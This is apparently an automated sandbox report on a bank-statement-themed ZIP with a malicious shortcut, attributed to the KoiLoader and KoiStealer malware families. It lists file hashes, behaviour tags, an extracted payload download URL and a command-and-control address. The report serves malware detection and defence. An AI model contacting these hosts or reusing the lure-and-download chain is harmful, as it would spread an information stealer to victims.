General

  • Target

    bank_statement_04_2025.zip

  • Size

    809B

  • Sample

    250510-gsnzqavvcx

  • MD5

    0e441e5a6db5f30f438ec363a00a68f3

  • SHA1

    d6f39e006f6eb3a3e2e3df6d448950d1f9948c7b

  • SHA256

    3523653959c0083b7e106a71dd99acc03ccf09cb3452b9b65dcf17005917e389

  • SHA512

    c5c64274c4095b1d0bb3f3059949fd309c1c8b3eb386745e77cd7d5653a9f2ba93c50d7c42098b8c56d10ffb515b4fb1802ce269e6d1e075c80eb642c7d7c604

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.wilkinsonbeane.com/css/slider

Extracted

Family

koiloader

C2

http://185.62.56.10/trounced.php

Attributes
  • payload_url

    https://www.wilkinsonbeane.com/css/slider

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.wilkinsonbeane.com/css/slider

Targets

    • Target

      bank_statement_04_2025.lnk

    • Size

      1KB

    • MD5

      a7727b666db4909929ecb590fae94ec8

    • SHA1

      8b203aaf632feb9c0ee7babe542e4a53457990ed

    • SHA256

      9e41baef8d2a8abc30a7e1dd1a946222b204d7d3183139cd793d1920c704e23d

    • SHA512

      165dfa130c3ee453b761788f0c727390f41d85c7f9d27331e5f68cbc7264f00f56b69e1099e82a95528a518d75c5a1b237e23111c2ee6f035b0a0bb9bb05417a

    • KoiLoader

      KoiLoader is a malware loader written in C++.

    • KoiStealer

      KoiStealer is an infostealer written in C#.

    • Koiloader family

    • Koistealer family

    • Detects KoiLoader payload

    • Detects KoiStealer payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Indicator Removal: Clear Persistence

      Clear artifacts associated with previously established persistence like scheduletasks on a host.

MITRE ATT&CK Enterprise v16

Tasks